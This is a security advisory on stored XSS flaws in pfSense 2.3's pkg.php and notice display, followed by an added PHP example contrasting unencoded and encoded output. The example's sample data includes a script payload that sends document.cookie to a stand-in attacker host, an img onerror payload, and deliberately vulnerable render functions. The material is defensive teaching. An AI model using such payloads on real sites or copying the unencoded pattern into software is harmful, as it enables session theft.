A Cross-Site Scripting (XSS) vulnerability was found in pkg.php, part of the pfSense WebGUI, on pfSense 2.3 and earlier versions. pkg.php is used to display and manage lists of items used by packages. Items in these lists were displayed without encoding, which could result in a stored XSS if the package did not validate or sanitize the data when the values were stored.

A second Cross-Site Scripting (XSS) vulnerability was found in Notice handling, part of the pfSense WebGUI, affecting pfSense 2.3 only. The firewall displays notices generated by various parts of the system to inform the user of problems or significant events. The text of these notices was not encoded before display, leading to a potential persistent XSS.

Because the affected variables and pages lack proper output encoding, arbitrary JavaScript can be executed in the user's browser, and the user's session cookie or other session information may be compromised. In the case of the potential Notices XSS vector, the notice text is not directly controllable by the user, but in certain cases it was populated with an HTML response from a remote server controlled by the pfSense project.
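The defect class behind both findings above is the same: a stored value is written into HTML without output encoding, so the page relies on whoever stored the value (a package, or the remote notice source) to have sanitized it. The following is an added illustrative example in PHP (the language of the pfSense WebGUI); it is not pfSense's own code, the function names (render_row_vulnerable, render_notice_encoded, h, contains_raw_tag) are hypothetical, and the stored strings are constructed for the demo. It shows the unencoded rendering pattern for a package list row and for a notice beside the hardened form, which encodes at the output boundary regardless of what the producer did at storage time:

```php
<?php
// Added illustrative example, not pfSense code. Demonstrates the defect
// class described in the advisory (unencoded output of stored values) next
// to the hardened form. Run from the command line: php xss_encoding.php
declare(strict_types=1);

// Constructed sample data: the kind of thing a package or a remote notice
// source could have stored. Hypothetical strings, not real pfSense data.
$storedItems = [
    ['name' => 'example-list', 'descr' => 'A normal description'],
    ['name' => 'evil-entry',   'descr' => '<script>document.location="https://attacker.invalid/?c="+document.cookie</script>'],
];
$storedNotice = 'Update check failed: <img src=x onerror="alert(document.cookie)">';

// Vulnerable pattern (hypothetical): the stored string is interpolated
// straight into the markup, so any HTML it carries becomes part of the page.
function render_row_vulnerable(array $item): string
{
    return "<tr><td>{$item['name']}</td><td>{$item['descr']}</td></tr>\n";
}

function render_notice_vulnerable(string $text): string
{
    return "<div class=\"alert\">{$text}</div>\n";
}

// Hardened pattern: encode every untrusted value where it meets HTML.
function h(string $s): string
{
    // ENT_QUOTES also encodes single quotes, so the result is safe inside
    // quoted attributes; ENT_SUBSTITUTE avoids an empty return on bad UTF-8.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_row_encoded(array $item): string
{
    return "<tr><td>" . h($item['name']) . "</td><td>" . h($item['descr']) . "</td></tr>\n";
}

function render_notice_encoded(string $text): string
{
    return "<div class=\"alert\">" . h($text) . "</div>\n";
}

// Crude check for this demo only: is an unencoded tag from the stored value
// still present in the rendered markup?
function contains_raw_tag(string $html, string $tag): bool
{
    return stripos($html, '<' . $tag) !== false;
}

echo "--- vulnerable output ---\n";
foreach ($storedItems as $item) {
    echo render_row_vulnerable($item);
}
echo render_notice_vulnerable($storedNotice);

echo "\n--- encoded output ---\n";
foreach ($storedItems as $item) {
    echo render_row_encoded($item);
}
echo render_notice_encoded($storedNotice);

echo "\nraw <script> in vulnerable row: " . var_export(contains_raw_tag(render_row_vulnerable($storedItems[1]), 'script'), true) . "\n";
echo "raw <script> in encoded row:    " . var_export(contains_raw_tag(render_row_encoded($storedItems[1]), 'script'), true) . "\n";
echo "raw <img> in vulnerable notice: " . var_export(contains_raw_tag(render_notice_vulnerable($storedNotice), 'img'), true) . "\n";
echo "raw <img> in encoded notice:    " . var_export(contains_raw_tag(render_notice_encoded($storedNotice), 'img'), true) . "\n";
```

The design point is that encoding belongs at the output boundary, not at the storage boundary: the pkg.php finding arose precisely because the page trusted packages to sanitize on store, and the Notices finding because text that was never user-typed still came from an untrusted channel (an HTML response from a remote server). Encoding in the template makes both cases safe without any assumption about the producer.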